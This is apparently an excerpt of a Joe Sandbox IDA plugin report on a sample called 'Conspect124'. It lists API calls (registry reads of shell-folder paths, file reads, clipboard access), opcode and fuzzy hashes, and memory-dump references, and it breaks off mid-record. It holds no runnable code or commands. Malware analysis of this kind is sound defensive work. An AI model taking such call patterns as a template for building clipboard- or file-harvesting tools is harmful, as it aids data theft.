                                      • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                      • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                      • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                      • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                      APIs
                                      • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                      • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                      • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                      • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                      APIs
                                      • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: EnumNamesResource
                                      • String ID:
                                      • API String ID: 3334572018-0
                                      • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                      • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                      • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                      • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                      APIs
                                      • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                      • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                      • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                      • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                      APIs
                                      • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: CloseFind
                                      • String ID:
                                      • API String ID: 1863332320-0
                                      • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                      • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                      • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                      • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                      APIs
                                      • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Open
                                      • String ID:
                                      • API String ID: 71445658-0
                                      • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                      • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                      • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                      • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                      • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                      • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                      • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                      • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                      • Opcode Fuzzy Hash: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                      • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                      APIs
                                      • memset.MSVCRT ref: 004095FC
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                        • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                        • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                        • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                      • String ID:
                                      • API String ID: 3655998216-0
                                      • Opcode ID: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                      • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                      • Opcode Fuzzy Hash: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                      • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                      APIs
                                      • memset.MSVCRT ref: 00445426
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                      • String ID:
                                      • API String ID: 1828521557-0
                                      • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                      • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                      • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                      • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _wcsicmp
                                      • String ID:
                                      • API String ID: 2081463915-0
                                      • Opcode ID: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                      • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                      • Opcode Fuzzy Hash: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                      • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                      APIs
                                        • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                      • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: File$CloseCreateErrorHandleLastRead
                                      • String ID:
                                      • API String ID: 2136311172-0
                                      • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                      • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                      • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                      • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                      APIs
                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ??2@??3@
                                      • String ID:
                                      • API String ID: 1936579350-0
                                      • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                      • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                      • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                      • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID:
                                      • API String ID: 1294909896-0
                                      • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                      • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                      • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                      • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID:
                                      • API String ID: 1294909896-0
                                      • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                      • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                      • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                      • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID:
                                      • API String ID: 1294909896-0
                                      • Opcode ID: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                      • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                      • Opcode Fuzzy Hash: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                      • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D
                                      APIs
                                      • EmptyClipboard.USER32 ref: 004098EC
                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                      • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                      • GlobalLock.KERNEL32(00000000), ref: 00409927
                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                      • GetLastError.KERNEL32 ref: 0040995D
                                      • CloseHandle.KERNEL32(?), ref: 00409969
                                      • GetLastError.KERNEL32 ref: 00409974
                                      • CloseClipboard.USER32 ref: 0040997D
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                      • String ID:
                                      • API String ID: 3604893535-0
                                      • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                      • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                      • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                      • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                      APIs
                                      • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                      • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                      • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Library$AddressFreeLoadMessageProc
                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                      • API String ID: 2780580303-317687271
                                      • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                      • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                      • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                      • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                      APIs
                                      • EmptyClipboard.USER32 ref: 00409882
                                      • wcslen.MSVCRT ref: 0040988F
                                      • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                      • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                      • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                      • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                      • CloseClipboard.USER32 ref: 004098D7
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                      • String ID:
                                      • API String ID: 1213725291-0
                                      • Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                      • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                      • Opcode Fuzzy Hash: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                      • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                      APIs
                                      • GetLastError.KERNEL32 ref: 004182D7
                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                      • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                      • LocalFree.KERNEL32(?), ref: 00418342
                                      • free.MSVCRT ref: 00418370
                                        • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                        • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                      • String ID: OsError 0x%x (%u)
                                      • API String ID: 2360000266-2664311388
                                      • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                      • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                      • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                      • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ??2@??3@memcpymemset
                                      • String ID:
                                      • API String ID: 1865533344-0
                                      • Opcode ID: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                      • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
